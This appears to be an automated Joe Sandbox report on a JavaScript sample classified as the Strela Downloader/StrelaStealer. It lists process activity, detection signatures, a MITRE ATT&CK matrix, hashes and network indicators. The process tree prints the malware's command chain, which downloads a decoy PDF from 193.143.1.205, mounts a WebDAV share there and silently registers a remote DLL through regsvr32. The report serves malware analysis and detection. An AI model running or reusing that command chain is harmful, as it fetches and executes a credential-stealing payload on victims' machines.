Windows
Analysis Report
1183413479481820270.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7924 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\11834 1347948182 0270.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8040 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\472 2222574495 .dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8048 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8096 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7908 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 3276 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 8280 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 28 --field -trial-han dle=1592,i ,117975034 5969004234 5,16051416 6420364547 49,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7328 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588532 |
Start date and time: | 2025-01-11 02:06:43 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 12s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 1183413479481820270.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 184.28.90.27, 23.209.209.135, 199.232.214.172, 2.16.168.107, 2.16.168.105, 23.200.0.133, 23.200.0.169, 192.168.2.10, 13.107.246.45, 3.219.243.226, 20.109.210.53, 104.78.188.188
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
20:07:34 | API Interceptor | |
20:07:38 | API Interceptor | |
20:07:38 | API Interceptor | |
20:07:46 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.8807362557818706 |
Encrypted: | false |
SSDEEP: | 1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG98:0J7adfWuK0p/QDfKoPeuP0aN4fqoxD |
MD5: | 1886A3922314F7E0D650D70122B5FB69 |
SHA1: | 49DB5173DA7B0DFEECF777C3DA3FC43228356BF8 |
SHA-256: | EFEC230D6C78020D27042E4FD43D76E691D4DC190A2588526AB05BAAA7CAAB60 |
SHA-512: | 4E731AF1C3A9554284FEF8B8FA2FEED9F5BFFC5586BBCC56E001A8BF9DD1991B25927F37C8CA29636A64CD293A5FC36AA9C9B9B22F239B4669911311DE8865BD |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7880378929359049 |
Encrypted: | false |
SSDEEP: | 1536:TbvSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzB:/azaPv4V4fXq2UaB |
MD5: | 0B094008AD7EF5A6E866665CDC1697B1 |
SHA1: | 26B0F5FD8C70D6591BF6A1BE38316300DFA80C04 |
SHA-256: | 53715A95EEFC16B6FEE3588E374D9F89D0A288C5769BBEAE16AE7487DD455E34 |
SHA-512: | 4DB791F090E6BA71B02E89442166E2E1C984FB2A5CBF24076AD8D47E2078C3BD4FD83336F6C14C3B4AD78FF984725BE09AFFFD0B407F98DA57355FC6F6C887C2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08136402894011019 |
Encrypted: | false |
SSDEEP: | 3:xPmlltKYe1HPdGmXlVG0+q2Iqe8lokukbtillNTt/4ll/Q6beV/:olXKz1HPsUGE8l5u6tGHtc6V |
MD5: | 04B04B10398ABC37382C01F66C475910 |
SHA1: | 014E3D4D91106D96FC0A0ED6A5CDE1B53335DD79 |
SHA-256: | 980F9569A15010C0C82D275401736BF9688105A0B166121AADB2AD51FAE06637 |
